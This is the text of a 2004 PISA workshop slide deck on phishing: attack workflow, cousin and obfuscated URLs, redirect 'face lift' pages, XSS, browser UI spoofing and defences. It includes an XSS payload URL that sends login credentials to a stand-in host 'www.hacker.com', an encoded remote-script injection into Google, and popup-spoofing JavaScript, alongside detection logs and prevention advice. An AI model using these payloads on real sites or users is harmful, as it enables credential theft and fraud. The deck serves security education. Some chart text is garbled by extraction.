Supported by Computer Studies Division, City University of Hong Kong

Presented by

Mr. Alan Lam

Mr. Bernard Kan
Mr. S.C. Leung

2 (PHISHING )
 Disclaimer
• This material is NOT intended to be adopted in the course of
attacking any computing system, nor does it encourage such
act.
• PISA takes no liability to any act of the user or damage
caused in making use of this report.
• The points made here are deliberately kept concise for the
purpose of presentation. If you require technical details
please refer to other technical references.

3 (PHISHING )
 Copyright
• The copyright of this material belongs to the Professional
Information Security Association (PISA).
• A third party could use this material for non-commercial
purpose, given that no change in the meaning or
interpretation of the content was made and reference is
made to PISA. All rights are reserved by PISA.

4 (PHISHING )
 Agenda
1. Overview of Phishing ?
1.1 What is Phishing?
1.2 Examples of Phishing .. email, web site
1.3 Current Profile of Phishing Attack

2. Attack Strategies & Technologies and Defenses

2.1 Cousin URL Attack
2.2 URL Obfuscation Attack
2.3 Face Lift Attack
2.4 Cross-site Scripting Attack
2.5 Visual Spoofing Attacks
2.6 Other Attacks

3. Defense Strategies Against Phishing Attack

3.1 Policy and User Education
3.2 Prevention
3.3 Detection
3.4 Incident Response and Collaboration
5
3.5 Long Term Dev’t
(PHISHING ) in technology infrastructure and legislation
 1.1 What is Phishing?
Phishing attacks use 'spoofed' e-mails and
fraudulent websites designed to fool recipients
into divulging personal financial data such as
credit card numbers, account usernames and
passwords, social security numbers, etc.

Quoted from
http://www.antiphishing.org

6 (PHISHING )
 Origin of Term

• Phreaking + Fishing = Phishing

• Phreaking: exploiting vulnerability of phone system to make calls
without paying in the 70’s
• Fishing : Use of bait to get target on hook

7 (PHISHING )
 Why Phishing becomes a threat to us?
• Online transaction, such as e-banking, becomes more and more popular
– Versign July 2004 report: eCommerce yearly increase by 13.2%

• In order to make their online transaction service easy to use and please their
customers, some service providers sacrifice good security feature, such as user
certificate.

• Fantasy web features (DHTML, Java, ActiveX, Flash, XML) introduce new web
vulnerabilities which may not be caught up by most service providers and browser
vendors. And these web features are supported by most email/newsreaders, search
engines, chat rooms, or ICQ.

• Spamming technology and facilities are becoming mature. Legislation in this area
cannot catch up.

• Internet being a Virtual World, it lacks a physical identity for user to validate. Trust
building is an intrinsic problem.

• The current Internet infrastructure is insecure by default.

• It is much cheaper and safer for attackers to carry out fraud in the Internet.

• All the above points encourage attackers to gain financial profit by Phishing attack.
8 (PHISHING )
 How does Phishing work?
• Social engineering used in the crafted Spam email and Fake
web site
– Use spoofed identity (of trusted organization) to gain trust
– Use the wording and tune that the trusted organization usually uses
– Emphasize an urgency to “update” or “validate” data to rectify
problem
– Threaten to terminate account or process the mistaken transaction
– Inform user to get free coupon or win lottery because of product
promotion

• Luring victim to a bogus website (the net in fishing)

– Convincing URL
– Disguised web interface
• Make the bogus web site look like the original web site.
• Detail level down to fonts, company logo, or even the browser UI
– When users login the bogus website, username and password are
captured.

9 (PHISHING )
 Workflow of Phishing Attack
1. Preparation
a. Research and Development
• Identify the target organization
• Identify the vulnerability of the target organization web page
• Iidentify the vulnerability of email reader and web browser that can
facilitate the attack
b. Prepare scam email and Capture website according to the above
collected information
c. Gather or purchase email addresses
d. Ride on SMTP Open Relay or purchase similar services

2. Attacking
a. Send out scam mail (the bait) via open relay server / services
b. Post the scam mail to newsgroups, chartrooms, ICQ messages or
Banner advertising
c. Submit the bogus website to search engines
d. Wait for victim at the Capture Website (the trapping net)

3. Harvesting
a. Capture data collected at Capture Website
b. Use or Sell the data or captured hosts…

10 (PHISHING )
 Phishing Categories
Attackers’ Objectives
– Fraud in money transfer
– Fraud in personal information theft
– Installing Key Logger and Trojan for
other purposes such as proxy for other
attacks

Loss and Damage

– Financial
– Leakage of sensitive information
– Control of computer fallen to attacker
– Damage to branding and corporate
image
– Damage to consumer confidence in
online transaction and eventually impact Image Source:
www.jcsbank.com/ phishing.html
development of e-Commerce
11 (PHISHING )
 Demonstration 1
Examples of Phishing
PayPal
Ebay
Hang Seng Bank
HSBC
Citibank
US Bank
SunTrust Bank
Citizens Bank
12 (PHISHING )
 1.3 Current Profile of Phishing
Attack
References

• Verisign Internet Intelligence Briefing (2004-07)

– http://www.verisign.com/stellent/groups/public/documents/white_paper/00
6583.pdf

• Anti-Phishing Working Group (APWG) Trend Report (2004-06)

– http://www.antiphishing.org/APWG_Phishing_Attack_Report-Jun2004.pdf

• Gartner Report (2004-06)

– Internet Banking Fraud had brought about loss of US$2.4B
– http://www.itu.int/osg/spu/newslog/categories/indicatorsAndStatistics/2004
/06/21.html#a692

• Hong Kong Police Statistics (2004-07)

13 (PHISHING )
 Anti-Phishing Working Group Trend
Report (2004-06)

Monthly Unique phishing attacks

1500
1422

1125 1197
Count of unique

1000
attacks

402
500
282
176

0
Jan-04 Feb-04 Mar-04 Apr-04 May-04 Jun-04
Month

14 (PHISHING )
 Phishing Attack Target (APWG 2004-06)

1. Citibank
2. eBay
3. US Bank
4. Pay Pal

12 VISA

17. HSBC

15 (PHISHING )
 Phishing Web site location
Verisign (2004-07) APWG (2004-06)
Verisign APWG
Country Percentage Country Percentage
USA 63 USA 27
South Korea 10 South Korea 20
Mainland China 5 Mainland China 16
Brazil 2 Taiwan 7
Poland 2 Holland 3

• Phishermen usually choose location (APWG 2004-06)

– Where there is language or time zone difference with brand owner,
to create the barrier to close down the bogus web site
– On compromised machines (25% by analysis)

16 (PHISHING )
 Phishing Sender Source
• Verisign (2004-07) • APWG (2004-06)

2% 5% 1% 7%

92%
93%
Spoofed Address Spoofed Address
Cousin Address Cousin Address
Web Email Address Web Email Address

17 (PHISHING )
 Phishing impact can be great
• Impact to USA (Gartner Report 2004-06)
– 57 million US consumers attacked
– 3-5% recipients became victims
– About 1.98 million reported their account intruded
– Loss involved was US$2.4 billion (average loss per victim
US$1,200)

18 (PHISHING )
 Phishing and Bogus Website
in Hong Kong
Phishing and Bogus Website Report
50 45
Reported Cases

40 36

30
30 28
25

20
14

10
3 3 4 4 3 4
1 2 1 2 2 2
0 0 0 0 0 1 1 1
0

04
3
3
03

04
3

4
3

4
4
3
3

v-0
l-0

p-0

b-0

r-0
g-0

r-0

-0
c-0
t-0

n-
n-

n-
Ju

ay
Ma

Ap
No
Oc

Ju
De
Ju

Ja

Fe
Se
Au

M
Phishing Report
Bogus Website

Source: Hong Kong Police Force

19 (PHISHING )
 2. Attack Strategies and
Technologies
• Before 2003, Social Engineering was the major attack
– Email with impersonated name and logo, together with
disguised tone of messages
– Two technical tricks were also used
• Cousin URL carry similar
• Bogus URL using old techniques
• Since 2003, technologies emerged to trick the
browser, or even mimic the SSL web page style
• Face Lift
• Bogus URL using new techniques
• Cross-site Scripting
• Visual Spoofing
• Other attacks

20 (PHISHING )
 2.1 Cousin URL
Hong Kong Banking Some Cousin URL as example
Bogus Websites
(Red: Bogus Cousin URL)
2003 (Jan-Dec) 8 cases
• ? ? ? ? (www.hkbea.com)
2004 (Jan - Jul) 18 cases • www.eastasiacredit.com
• www.onlinebea.com
• ? ? ? ? (www.hsbc.com)
• www.hkhsbc.com
• ? ? ? ? (hk.dbs.com)
• www.dbshk.net
• ? ? ? ? (www.standardchartered.com)
• www.scbltd.com
• ? ? ? ? (www.dahsing.com)
• www.dasxin.com
• www.dlfh.com
• ? ? ? ? (www.iba.com.hk)
• www.ibabankhk.com
Source: • www.hkiba.com
Hong Kong Police Force • More…

21 (PHISHING )
 Cousin URL:
https://visa-secure.com/personal/secure_with_visa/

22 (PHISHING )
 2.2 URL Obfuscation Attack
• Normal representation of URL
– Domain: http://www.pisa.org.hk

• Dotted representation of IP address URL

– Decimal: http://202.81.255.242
– Hexadecimal: http://0xca.0x51.0xff.0xf2
– Octal http://0312.0121.0377.0362

• Dot-less representation of IP address URL

– Decimal: http://3639552355 http://7689338866 …
– Hexadecimal: http://0xCA51FFF2
– Reference:
A dot-less Decimal IP calculator can be found at
http://www.tcp-ip.nu/cgi-bin/tcp-ip/calc.cgi

23 (PHISHING )
 2.2 URL Obfuscation Attack
• Valid Use of “@’
– “RFC1738 - URL”? ”RFC2396 – URI Generic Syntax” allows a valid
Uniform Resource Locators (URL) syntax
<user>:<password>@<host>:<port>/<url-path>
– Application: use URL to carry username and password, e.g.
• ftp://user1:pass@myftp.com:1021/public/file1.gzip

• Malicious Use of “@’ to hide bogus host

– http://www.microsoft.com@www.pisa.org.hk
– http://www.microsoft.com@202.81.255.242 (IP address)
– http://www.microsoft.com@3394371570 (decimal representation)
– http://www.microsoft.com111111111111111111111111111111111111
11111111111111111111111@3394371570

• Browser’s Address bar and Status bar CAN DISPLAY the

actual content but normal user may not notice

24 (PHISHING )
 2.2 URL Obfuscation Attack
• Escaped Encoding (or % encoding)
– RFC1738 - URL”? ”RFC2396 – URI Generic Syntax” allows URL
encoded as ASCII in Hexadecimal representation
– ”%##” (## : 00 – FF)
• %20= [space], %2E=“.”, %7E=“~”
• %31=“1”, %32=“2”
• %41=“A”, %61=“a”
– Where will this URL bring you to?
• http://www.microsoft.com@%79%61%68%6F%6F%2E%63%6F%6D

http://www.microsoft.com@yahoo.com

• Browser’s Address bar and Status bar CAN DISPLAY the actual
content but normal user may not notice

• Reference of % Encoding and online encode/decoder

http://www.blooberry.com/indexdot/html/topics/urlencoding.htm

25 (PHISHING )
 2.2 URL Obfuscation Attack
• Other derived formats of URI
– Unicode encoded URL
• Unicode was designed to allow multiple language implementations of
the ASCII character set
• http://&#119;&#119;&#119;&#46;&#112;&#105;&#115;&#97;&
#46;&#111;&#114;&#103;&#46;&#104;&#107;
– Mixed Unicode and ASCII
• http://&#119;&#119;&#119;%2E%70%69%73%61%2E%6F%72%6
7%2E%68%6B

• References
Unicode Encoding:
http://www.unicode.org/

Free Online UTF Decoder (choose “Freeform numeric):

http://software.hixie.ch/utilities/cgi/unicode-decoder/utf8-decoder

26 (PHISHING )
 2.2 URL Obfuscation Attack

• IE or other browser Vulnerability in displaying

proper URL at
– Status Bar
– Address Bar

27 (PHISHING )
 URL Obfuscation Attack (Status Bar)
• Inline Javascript
– <A Href= … onMouseOver=..>
• <Form>
• <Table>
• <Table Border>
• <Image Map>

28 (PHISHING )
 URL Obfuscation Attack (Address Bar)
(IE vulnerability in displaying URL)
• IE 5.x ? 6.0 has a vulnerability in handling URL. When
the URL contains special characters, the character string
after the special character cannot be displayed.
(Microsoft knowledgebase article 834489)

• For example, use escaped encoded characters %00 (null

character) and %01
– http://www.yahoo.com%01%00@www.pisa.org.hk
– http://www.yahoo.com%01%00@202.81.255.242
– http://www.yahoo.com%01%00@3394371570

• IE will bring user to “www.pisa.org.hk”, whereas the

Address bar and Status bar cannot display the true visited
URL!
29 (PHISHING )
 IE vulnerability in displaying URL
• MS04-004 (2004-02) released
a patch to remove support in
HTTP to the URI format

<user>:<password>@
<host>:<port>/<url-path>

http://www.microsoft.com/technet/s
ecurity/Bulletin/MS04-004.asp

• However, after applying the

patch, Address bar and Status
bar still do NOT display the
correct URL.

30 (PHISHING )
 Known Attack using the MS04-004

• Exploit-URLSpoof
Trojan

• McAfee alert
http://vil.nai.com/vil/cont
ent/v_100927.htm

31 (PHISHING )
 IE vulnerability in handling URL
• Works with DNS server which accepts dummy subdomain,
e.g. http-equiv.dyndns.org

• http://www.microsoft.com.technet.security.bulletin.MS04-
029.mspx.12345.123451234512345678901234567123456789
0123456789.box&&cm=&ce=3&hl=malware.http-
equiv.dyndns.org/~http-equiv/mwaresoft.html

Effective = *.http-equiv.dyndns.org/~http-equiv/mwaresoft.html

• Reference URL: http://www.malware.com/malwaresoft.html

32 (PHISHING )
 2.2 URL Obfuscation Attack
• Shortened URL
– http://www.rapp.org/url/
• PISA http://www.rapp.org/url/?IUVST6C8
• Workshop: Phishing Exposed
http://www.rapp.org/url/?KRRQ7YYH

– http://csua.org/u/
• PISA http://csua.org/u/9fy
• Workshop: Phishing Exposed http://csua.org/u/9iu

33 (PHISHING )
 Demonstration 2
URL Obfuscation Attacks

34 (PHISHING )
 2.3 Face Lift (管 )
• Use URL Redirect or similar technology
• Take advantage of the real web site’s face to
confuse the identity of Bogus Login Page

<META HTTP-EQUIV="Refresh" CONTENT="0;

url=http://www.anz.com.au/">

Online Banking
Main Page (real) Online Login (bogus)
Usename myuserid
Password *******

35 (PHISHING )
 Case Study ANZ bank phishing

Email content
:
: “%##” Hexidecimal format
:
http://anz.com.au%32inetbank%32%32%32@%36%31%2E%31%30%2E%31%32
:
%30%2E%32%30%30 %32%37%38%34/%69%6E%65%74%62%61%6E%6B/%6
9%6E%64%65%78%2E%68%74%6D

Bogus URL – old technique

 http://anz.com.au2inetbank222 @61.10.120.200:2784/inetbank/index.htm

36 (PHISHING )
 Content of BOGUS web page
“http://61.10.120.200:2784/inetbank/index.htm”

:
<script LANGUAGE="JavaScript">
:
SafeAddOnload(PUWStart);

1 PopUp page
Login

gPopupWindow = new PopupWindow("login.htm", 350, 150);
gPopupWindow.toolbar = false;
gPopupWindow.statusbar = true;
gPopupWindow.resizable = true;
gPopupWindow.ontop = true;
</script>
</head>

<body bgcolor="#FFFFFF" text="#000000">

2 Background
Redirect
<META HTTP-EQUIV="Refresh" CONTENT="0;
37
url=http://www.anz.com.au/">
(PHISHING )
 Online Banking Login (Bogus)
1 PopUp page
Login

No SSL
2 Background
Redirect
<META HTTP-EQUIV="Refresh" CONTENT="0; url=http://www.anz.com.au/">
38 (PHISHING )
 Case Study ANZ bank phishing
Face Lift

2 2

1
userid
********

39 (PHISHING )
 Case Study ANZ bank phishing
Track Hiding

After entering PIN

SSL padlock shown ??!!
40 (PHISHING )
 Online Banking Login (real)

Real digital cert

of web site

Real login has SSL padlock

41 (PHISHING )
 Defense vs. Cousin URL (Prevention)
• Use a consistent and persistent web interface
• Communicate a Single Simple Domain name
XYZBank owns these domains and have web servers for each

xyzbank.com
xyzcorp.com
xyzgroup.com

They use these domains for Online banking

online-xyzbank.com
secure-xyzbank.com

They use these domains for HK and Australia Online banking

online-xyzbank.com.hk
secure-xyzbank.com.au

42 (PHISHING )
 Defense vs. Cousin URL (Prevention)
• Is this better?

XYZBank owns these domains

xyzbank.com (only active domain)

xyzcorp.com (forward to xyzbank.com)
xyzgroup.com (forward to xyzbank.com)

They these SubDomain for Online banking

online.xyzbank.com (personal banking)
secure.xyzbank.com (corporate banking)

They use these URL paths for HK and Australia Online banking
online.xyzbank.com/hk/
secure.xyybank.com/au/

43 (PHISHING )
 Defense vs. Cousin URL (Detection)

• Brand Management
• Domain Monitoring
Can be Outsourced
• Web Crawling
• Intelligence Report from
Spam Filtering services

44 (PHISHING )
 Detection (Server side)
• Detect Mirroring from Copycat Web Site
– Monitor large volume traffic, especially from a
single subnet
– Placing Honeypot links (invisible links with no
effective use) to detect access
check “access
log”

• Detect Referral Site

– At your web server monitor the referrer
information from the “access log”, it may give you
information of referral site, search engine or
attacker by FaceLift / Framing /etc. attack

45 (PHISHING )
 Server and Site Design
Reference

• PISA’s HK e-Commerce Security Survey 2003

– Non-intrusive and Anonymous study on 25 local on-line
transaction sites
• Application design
• SSL and Encrypted Communication Digital Certificate
Implementation
• Password Management
• Operation Control
– URL
• http://www.pisa.org.hk/projects/websec2003/websec2003.htm

46 (PHISHING )
 Detection (Client side)
• Browser
– check digital certificate;
and turn on alert when
browser enters or
leaves SSL mode

47 (PHISHING )
 Detection (Client side)
• SpoofStick (browser • eBay Toolbar (browser
plug-in) plug-in
– Incorporated “Web
CallerID” technology
(acquired from
WholeSecurity) to detect
suspicious activity in
web page. Web CallerID
acts like a heuristic filter
for phishers, detecting
previously undiscovered
spam
• http://www.eweek.com/art
icle2/0,1759,1636422,00.a
sp

48 (PHISHING )
 Detection (Client)
• Some Antivirus programs detect malicious
popup javascript in web page

49 (PHISHING )
 Detection (Client)
• http://%32%31%31%2E%39%37%2E%32%34%38%2E%36
%30:%38%37/%63%69%74/%69%6E%64%65%78%2E%68
%74%6D ( http://211.97.248.60:87/cit/confirm.htm)

50 (PHISHING )
 2.4 Cross-Site Scripting
• A cross-site scripting vulnerability allows the
introduction of malicious content (scripts) on a
web site, that is then served to users (clients)
– Malicious scripts get executed on clients that trust
the web site
– Problem with potentially all client-side scripting
languages
• Use “XSS” to refer to these vulnerabilities, to
avoid confusion with “CSS” (cascading style
sheets)

51 (PHISHING )
 XSS Concept
• Any way to fool a legitimate web site to send
malicious code to a user’s browser
• Almost always involves user content (third
party)
– Error messages
– User comments
– Links
• References
– http://www.cert.org/archive/pdf/cross_site_scripting.pdf
– http://www.spidynamics.com/support/whitepapers/SPIcross
-sitescripting.pdf
52 (PHISHING )
 Why the Name
• You think that you interact with site Z
• Site Z has been poisoned by attacker
• The “poison” (e.g. JavaScript) is sent to you,
along with legitimate content, and executes. It
can exploit browser vulnerabilities, or contact
site M and steal your cookies, usernames and
passwords...
Z
Surfing Poison

Poison

Hostile Code Executes M

53 (PHISHING )
 XSS Risks
• Theft of account credentials and services
• User tracking (stalking) and statistics
• Misinformation from a trusted site
• Denial of service
• Exploitation of web browser
– Create phony user interface
– Exploit a bug in the browser
– Exploit a bug in a browser extension such as Flash
or Java
• Etc.
54 (PHISHING )
 XSS Risks - Stolen Account Credentials
• With XSS, it may be possible for your
credentials to be stolen and used by attacker
• With sites requiring authentication need to use
a technological solution to prevent
continuously asking users for passwords
– Credentials have the form of a SessionID or nonce
• Url encoding (GET method)
– http://www.site.com?ID=34539027644
• Cookies are commonly used to store credentials
– These are usually accessible to client-side scripts

55 (PHISHING )
 Cookie Mechanism and Vulnerabilities
• Used to store state on the client browser
• Access Control
– Includes specification of which servers can access
the cookie (a basic access control)
• Including a path on the server
– So cookie can be used to store secrets (sessionIDs
or nonces)

56 (PHISHING )
 XSS - Point
• XSS vulnerabilities fool the access control
mechanism for cookies
• The request for the cookie (by scripts) comes
from the poisoned server, and so is honored by
the client browser
– No vulnerabilities needed in the client browser

57 (PHISHING )
 XSS Risk - Privacy and Misinformation
• Scripts can “spy” on what you do
– Access history of sites visited
– Track content you post to a web site
• Scripts can misinform
– Modify the web page you are viewing
– Modify content that you post
• Privacy (“I have nothing to hide”)
– Knowledge about you can be valuable and be sued
against you
• Divorces, religion, hobbies, opinions
• etc.
58 (PHISHING )
 Example: Google’s XSS Vulnerability
• Just get to public at Oct 20.
• Scripts can be injected into Google to make it
become a subscription service:
– http://www.google.com/custom?cof=L:%6a%61%76%61%73%63%72%69%7
0%74%3a%6a%61%76%61%73%63%72%69%70%74%3a%64%6f%63%75
%6d%65%6e%74%2e%61%70%70%65%6e%64%43%68%69%6c%64%28%
64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65
%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%29%2e%73%
72%63%3d%27%68%74%74%70%3a%2f%2f%6a%69%62%62%65%72%69
%6e%67%2e%63%6f%6d%2f%74%65%73%74%32%2e%6a%73%27

59 (PHISHING )
 Example: Google’s XSS Vulnerability

60 (PHISHING )
 XSS Risk - Denial of Service
• Nasty JavaScripts can make your web site
inaccessible
– Make browsers crash or become inoperable
– Redirect browsers to other web sites

61 (PHISHING )
 XSS Risk - Silent Install
• Exploitation of browser vulnerabilities
– JavaScript, ActiveX, etc. allow the exploitation of
browser vulnerabilities
• Run locally on your machine
• User security confirmation bypass vulnerability in
Microsoft Internet Explorer 6.0 SP2:
– http://securityfocus.com/bid/11200/
– Allows malicious users to trivially bypass the requirement for
user confirmation to load JavaScript or ActiveX
– Installation of malicious code

62 (PHISHING )
 XSS Risk - Phishing
• User Interface Modifications
– Present fake authentication dialogs, capture information
then perhaps redirect user to real web site
– Replace location toolbar to make user think they are
visiting a certain web site
• Phishing Scenario
• Victim logs into a web site
• Attacker has spread “mines” using an XSS vulnerability
• Victim stumbles upon an XSS mine
• Victim gets a message saying that their session has
expired, and they need to authenticate again
• Victim’s username and password are sent to attacker

63 (PHISHING )
 Demonstration 3 - www.pisabank.com

64 (PHISHING )
 After successful user login...

65 (PHISHING )
 However, if login failed...

66 (PHISHING )
 Try to put scripts in URL...

67 (PHISHING )
 Reveal the injected scripts...

68 (PHISHING )
 Target to inject codes like this...

69 (PHISHING )
 We create the following url...

• http://www.pisabank.com/banklogin.jsp?serviceName=PisabankCaastAcce
ss&templateName=prod_sel.forte&source=Pisabank&AD_REFERRING_
URL=http://www.pisabank.com&err=%3C/form%3E%3Cform%20action=
%22login1.asp%22%20method=%22post%22%20onsubmit=%22XSSimag
e%20=%20new%20Image;XSSimage.src='http://www.hacker.com/'%20%
2b%20document.forms(2).login.value%20%2b%20':'%20%2b%20docume
nt.forms(2).password.value;%22%3E

70 (PHISHING )
 Put the url in scam mails...

71 (PHISHING )
 When the hyperlink is clicked...

72 (PHISHING )
 After the user login, nothing special...

73 (PHISHING )
 However...
• In www.hacker.com’s web server log, login
name and password are recorded
– 192.168.0.1 - - [14/Oct/2004:11:01:52 +0800]
"GET /bernard:IlovePisa HTTP/1.1" 404 719

74 (PHISHING )
 XSS - Prevention
• For users:
– disable scripting in browser (some personal
firewall can selectively block/allow scripts from
particular web sites)
– do not trust links in e-mails, type url directly in
browser
– always logout before browsing elsewhere
– keep up with web browser patches and versions

75 (PHISHING )
 XSS - Prevention
• For administrators/developers:
– User input should be parsed and filtered properly,
especially < > “ ‘ % ; ) ( & + -
– Some decent guidelines for input filtering can be
found in the OWASP Requirements document
"OWASP Guide to Building Secure Web
Applications and Web Services“
• http://www.owasp.org/documentation/guide.html
– Output based on Input parameters should be
encoded into ISO 8859 -1 for special characters
• http://www.cert.org/advisories/CA-2000-02.html

76 (PHISHING )
 XSS - Prevention
• For administrators/developers:
– For cookies: set the HttpOnly flag. Scripts that run
in a browser can’t access cookie values with flag
set
– Keep up with web server patches
– periodically test for XSS vulnerabilities by using
web application scanners
• e.g. Web Scarab
http://www.owasp.org/software/webscarab.html

77 (PHISHING )
 XSS - Detection
• XSS exploits can be detected by reviewing
web server access log, e.g.:
192.168.1.152 - - [14/Oct/2004:10:38:11 +0800] "GET
/banklogin.jsp?serviceName=PisabankCaastAccess&templateName=prod_sel.forte
&source=Pisabank&AD_REFERRING_URL=http://www.pisabank.com&err=%3C/form%3E%
3Cform%20action=%22login1.jsp%22%20method=%22post%22%20onsubmit=%22XSSimag
e%20=%20new%20Image;XSSimage.src='http://www.hacker.com/'%20%2b%20document
.forms(2).login.value%20%2b%20':'%20%2b%20document.forms(2).password.value
;%22%3E HTTP/1.1" 200 4058

78 (PHISHING )
 XSS - Detection
• XSS exploits can also be detected by network-
based Intrusion Detection System (IDS), e.g.
[**] WEB-MISC cross site scripting attempt [**]
10/21-23:04:54.960511 192.168.1.152:3341 -> 192.168.1.100:80
TCP TTL:128 TOS:0x0 ID:28082 IpLen:20 DgmLen:307 DF
***AP*** Seq: 0xAB1F9A5C Ack: 0xEFB2E94B Win: 0x4470 TcpLen: 20

47 45 54 20 2F 62 61 6E 6B 6C 6F 67 69 6E 2E 6A GET /banklogin.j
73 70 3F 65 72 72 3D 3C 73 63 72 69 70 74 3E 61 sp?err=<script>a
6C 65 72 74 28 27 58 53 53 27 29 3C 2F 73 63 72 lert('XSS')</scr
69 70 74 3E 20 48 54 54 50 2F 31 2E 31 0D 0A 41 ipt> HTTP/1.1..A
63 63 65 70 74 3A 20 2A 2F 2A 0D 0A 41 63 63 65 ccept: */*..Acce
70 74 2D 4C 61 6E 67 75 61 67 65 3A 20 7A 68 2D pt-Language: zh-
68 6B 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 hk..User-Agent:
4D 6F 7A 69 6C 6C 61 2F 34 2E 30 20 28 63 6F 6D Mozilla/4.0 (com
70 61 74 69 62 6C 65 3B 20 4D 53 49 45 20 36 2E patible; MSIE 6.
30 3B 20 57 69 6E 64 6F 77 73 20 4E 54 20 35 2E 0; Windows NT 5.
30 29 0D 0A 48 6F 73 74 3A 20 77 77 77 2E 70 69 0)..Host: www.pi
73 61 62 61 6E 6B 2E 63 6F 6D 0D 0A 43 6F 6E 6E sabank.com..Conn
65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 ection: Keep-Ali
76 65 0D 0A 43 6F 6F 6B 69 65 3A 20 4A 53 45 53 ve..Cookie: JSES
53 49 4F 4E 49 44 3D 32 42 43 43 39 44 45 36 43 SIONID=2BCC9DE6C
44 43 46 45 44 44 37 45 32 35 42 43 46 33 44 36 DCFEDD7E25BCF3D6
38 39 35 38 30 46 32 0D 0A 0D 0A 89580F2....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

79 (PHISHING )
 2.5 Visual spoofing
• Target to the web browser interface
• Display fake menu bar, status bar, dialogue
box on a web browser
– The address bar displays the fake URL address
– The status bar shows displays the golden “lock”
icon indicating a secure SSL session, which has
often been cited as a differentiator between
legitimate sites and scams
– The download or installation dialogue box shows
fake information

80 (PHISHING )
 How it works?
Graphic substitution approach
1. The bogus web page are opened without the
menu bar and status bar
window.open(“bogus.htm", "_blank", "height=700, width=683,
location=no, menubar=no, toolbar=no, status=no, resizable=no,
scrollbars=no");

2. The menu bar and status bar (with the golden

“lock” icon) images are displayed at the top and
bottom of the bogus web page to disguise as part of
the browser user interface

81 (PHISHING )
 Graphic Substitution Approach
Header image

Bogus web content

Footer image

82 (PHISHING )
 Graphic Substitution Approach
3. Combine with the java commands
“window.createPopup()” and
“popup.show()”, attacker can hijack the
entire user’s desktop and construct a
fake interface to capture and manipulate
what the user sees.
op=window.createPopup();
op.document.body.innerHTML="...html...";
op.show(0,0,screen.width,screen.height,document.body);

83 (PHISHING )
 Browser UI Rebuild Approach
1. The bogus web page are opened without the menu
bar and status bar
2. Some browser user interface functions (including
the certification view function) are rebuilt on the
bogus web page through download XUL (XML-
based User interface Language. Standards based
language developed by mozilla.org to create cross-
platform user interfaces for Mozilla-based products
such as the browser.)
Reference:
http://www.nd.edu/~jsmith30/xul/test/spoof.html

84 (PHISHING )
 Browser UI Rebuild Approach

85 (PHISHING )
 Overriding Page Content Approach
• IE browser allows creation of chromeless
windows which are screen objects that do not
have the normal borders and other controls
attached to them. Through javascript, they can
be positioned to hide or replace (by “sitting on
top”) underlying content.
• Attackers make use of these chromeless
windows to spoof the graphical components of
browser, such as URL address bar and
dialogue boxes for file download, software
installation, and bookmark.

86 (PHISHING )
 2.5 Visual spoofing
• Defense
– Keep your web browser updated
– Disable the javascript functions which hide
your web browser menu and status bar
– Check the page info and property of the
view web page before proceed
– Print mark browser UI

87 (PHISHING )
 Demonstration 4
Visual Spoofing

Graphical Substitution
FireFox Browser UI Rebuild Approach
Chromeless Window

88 (PHISHING )
 2.6 Other Attack
Trojan, Keylogger, Screen Grabber
Attacker can lure victim to install Trojan horse program
through a bogus software patch or update web page. Once the
victim has installed the Trojan horse program, the attacker can
closely monitor the victim PC activities by capturing its
keystroke and screen display.

– Keylogger
• Capture the victim keystroke in all windows
– Screen Grabber
• Screen dump or even video stream the victim screen display

89 (PHISHING )
 Demonstration 5
Keylogger and Screen Grabber
Using
BackOrifice

90 (PHISHING )
 2.6 Other Attack
Man in the Middle Attack
By poisoning the victim DNS server, attacker can redirect the traffic of a
legitimate site to the attacker server where the attacker can sniff
password information even in the HTTPS connection.
Legitimate
web server

The victim thought that he is talking to the

legitimate site

Victim PC

Actually, the victim is talking to the attack server

Attacker server which sniff the password

information and proxy the HTTPS traffic
between the victim and legitimate web server

91 (PHISHING )
 New Quiet Attack (4-Nov-2004)
• Change of HOST file
– Capture online banking details WITHOUT requiring users
to click on a website link
– Works even if USER TYPE IN URL MANUALLY
– Working Principle
• Execution of trojan to modify HOSTS file
• HOSTS file override DNS resolution
• User brought to malicious site next time he go to that online
transaction site.
• Defense
– Ensure Windows Scripting Host is disabled
– Have AV and antispyware software installed

• Reference: http://www.vnunet.com/news/1159171

92 (PHISHING )
 Defense Strategies
At end user side
• NEVER follow any link in e-mail, post article,
chart room, ICQ message, or Banner
advertising
• Enable your personal firewall to allow only
necessary traffic to go through
• Keep your software (mail reader, web browser,
virus definition) patched and updated
• Use the PKI properly

93 (PHISHING )
 Defense Strategies
At server side
• Make sure the web programs are fully tested such as input
parsing and invalid input handling
• Monitor any cousin domain created
• Monitor any phishing e-mail or post message that targeting
your organization in major search engines and your Honeypot
accounts
• Monitor your web server log and identify any suspicious web
pages from the referer information
• Provide secure web proxy service for their customers. This
web proxy can only connect their legitimate web sites and
nothing else
• Provide secondary authentication for transaction. E.G. send
one-time password to client through mobile SMS

94 (PHISHING )
 Defense Strategies
At system and network admin side
• Deploy anti-spamming and anti-virus measures
E.G. Black/white lists, keywords lists, semantics analysis, various rules
and characteristics, Bayesian Filtering, Challenge-Response Filtering,
SMTP Session Verification, TurnTideT Anti-spam Router … etc.
• Deploy Firewall, Intrusion Detection System and Intrusion
Prevention System to block attack and Trojan backdoor
connections
• Put all non-server machines in private IP networks
• Educate the users and make sure they stay with the updated
software patch
At the software vendor side
• Do not assume users have certain security knowledge or
awareness to use their products safety and wisely
• Do not lower the security level in their product default setting
• Don’t just make money. Spend more time to fix the bug and
fully test the product
95 (PHISHING )
 The Picture of Trust
Perception - Social engg.
Look and Feel - Cousin URL
Message and Tone - Face Lift
Trust Branding Trust

Physical Settings

CA Weak
Weak
Operation?
Operational Security Validation
Chain of Trust
Certificate & Revocation

Email Sender Validation XSS

Vulnerabilities
Application Application
Apps
Visual *Browser*
Transport (Host)Spoofing SSL Transport

MITM,
Network (Internet) DNS, Hosts file
Network Routing
DNS poison Network

MITM,
Link (LAN) ARP Sniffing Link
Resolution

Client IT Infrastructure Server

96 (PHISHING )
 Defense Strategies
• Policy and User Education
• Prevention
• Detection
• Incident Response and Collaboration

97 (PHISHING )
 3.1 Policy and User Education
• Ｐｏｌｉｃｙ　ａｎｄ　Ｒｅｇｕｌａｔｉｏｎ
– HKMA Guideline
